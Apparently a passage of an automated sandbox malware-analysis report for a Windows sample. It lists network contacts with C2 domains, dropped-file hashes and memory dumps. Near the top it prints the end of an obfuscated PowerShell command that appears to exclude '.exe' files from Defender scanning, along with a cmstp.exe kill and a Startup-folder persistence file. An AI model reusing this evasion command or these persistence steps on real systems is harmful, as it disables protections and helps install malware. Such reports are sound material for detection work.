102+[char]101+[char]114+[char]101+[char]110+[char]99+[char]101+[char]39+[char]44+[char]39+[char]112+[char]80+[char]114+[char]101+[char]39+[char]41+[char]32+[char]45+[char]69+[char]120+[char]99+[char]108+[char]117+[char]115+[char]105+[char]111+[char]110+[char]69+[char]120+[char]116+[char]101+[char]110+[char]115+[char]105+[char]111+[char]110+[char]32+[char]39+[char]101+[char]120+[char]101+[char]39| .((gV '*mdr*').NAMe[3,11,2]-joIn'')

C:\Windows\system32\taskkill.exe

taskkill /IM cmstp.exe /F

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 poolfreshstep.com udp
RU 185.170.144.39:80 poolfreshstep.com tcp
US 8.8.8.8:53 39.144.170.185.in-addr.arpa udp
US 8.8.8.8:53 228.249.119.40.in-addr.arpa udp
US 8.8.8.8:53 58.55.71.13.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 97.17.167.52.in-addr.arpa udp
US 8.8.8.8:53 fallback-01-static.com udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 132.145.90.111.in-addr.arpa udp
US 8.8.8.8:53 18.31.95.13.in-addr.arpa udp
US 8.8.8.8:53 75.117.19.2.in-addr.arpa udp
MY 111.90.145.132:7708 fallback-01-static.com tcp
US 8.8.8.8:53 poolfreshstep.com udp

Files

memory/4760-0-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp

memory/4760-1-0x0000000000C60000-0x0000000000C6C000-memory.dmp

memory/4760-2-0x000000001B7C0000-0x000000001B836000-memory.dmp

memory/4760-3-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/4760-4-0x00007FFF3D863000-0x00007FFF3D865000-memory.dmp

memory/4760-5-0x0000000002FC0000-0x0000000002FDE000-memory.dmp

memory/4760-6-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/4760-7-0x000000001BA90000-0x000000001BB70000-memory.dmp

memory/4760-10-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

C:\Users\Admin\A.inf

MD5 961df7710c27cd2a2452c11aa48ada24
SHA1 081694e0067918b8355efef2cf72ef52d82e44b0
SHA256 d3a48635568ef5d4c0a1c86b3f750f06362056807d39b9461cd053ca88ee7a41
SHA512 64f9e3950c01f000e70166c5cb783a0be77249f2c06c99e23a9ab05c6a3a92f18de2478592db3b3dd328c8e5af6abcdcf07c74b63c373b7a24bc336a80503aae

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_uajcztiv.2ns.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/4760-20-0x000000001B950000-0x000000001B972000-memory.dmp

memory/4760-21-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/4760-35-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sy.exe

MD5 d00a8f6a66f5fcaf18564b6f47831294
SHA1 d1ae07fd6267b53264f1764cc45aafbfe9f5f763
SHA256 a60e55b8c66eb98a300d09fbdbe932bdf53476b805f10be02e6a7f2acdee8039
SHA512 99937a6e5aeb1248c8c341e43a0747eb98f06f972b559690afa810787173b2eb00ac2b657fd6c82a25630b1a47ab343bbf0b4e7ee250c54e59c95fa7f6f94c27

memory/4760-48-0x00007FFF3D860000-0x00007FFF3E321000-memory.dmp

memory/656-49-0x0000000000B60000-0x0000000000BD0000-memory.dmp

memory/656-50-0x0000000005480000-0x000000000551C000-memory.dmp

memory/656-72-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-78-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-114-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-112-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-110-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-106-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-104-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-102-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-96-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-94-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-92-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-90-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-88-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-84-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-82-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-80-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-76-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-74-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-70-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-68-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-66-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-64-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-60-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-58-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-108-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-100-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-98-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-86-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-63-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-56-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-54-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-52-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-51-0x0000000005480000-0x0000000005516000-memory.dmp

memory/656-2905-0x0000000005630000-0x000000000565C000-memory.dmp

memory/656-2906-0x0000000005660000-0x00000000056AC000-memory.dmp

memory/656-2907-0x0000000005A30000-0x0000000005B20000-memory.dmp

memory/656-7876-0x0000000005B90000-0x0000000005BF6000-memory.dmp

memory/656-7877-0x00000000065B0000-0x0000000006B54000-memory.dmp

memory/656-7878-0x00000000060E0000-0x0000000006172000-memory.dmp

memory/656-7879-0x0000000006CE0000-0x0000000006CF2000-memory.dmp

memory/656-7880-0x0000000006DF0000-0x0000000006E40000-memory.dmp